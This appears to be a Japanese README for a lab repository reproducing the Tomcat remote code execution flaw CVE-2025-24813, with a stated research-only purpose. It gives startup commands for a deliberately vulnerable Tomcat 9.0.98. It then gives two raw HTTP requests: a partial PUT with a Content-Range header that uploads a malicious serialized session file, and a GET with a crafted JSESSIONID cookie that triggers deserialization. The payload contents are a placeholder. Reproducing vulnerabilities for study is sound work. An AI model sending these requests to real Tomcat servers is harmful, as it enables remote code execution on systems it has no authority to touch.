
このリポジトリは、CVE-2025-24813 Tomcat 最新のRCE再現環境です。
学習研究目的のみに使用してください!
本環境では上記の再現に必要な条件が有効になっています
Linux:
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run
Windows:
apache-tomcat-9.0.98/bin/catalina.bat run
悪意のあるシリアライズファイルを生成し、以下のデータパケットを使用してアップロードします。Rangeのチャンク値はLengthと一致し、かつ現在のファイル長より大きい必要があることに注意してください。
PUT /xxxxx/session HTTP/1.1
Host: 192.168.131.32:8080
Content-Length: 1000
Content-Range: bytes 0-1000/1200
{{反序列化文件内容)}}
以下のPOCを使用してトリガーします:
GET / HTTP/1.1
Host: 192.168.131.32:8080
Cookie: JSESSIONID=.xxxxx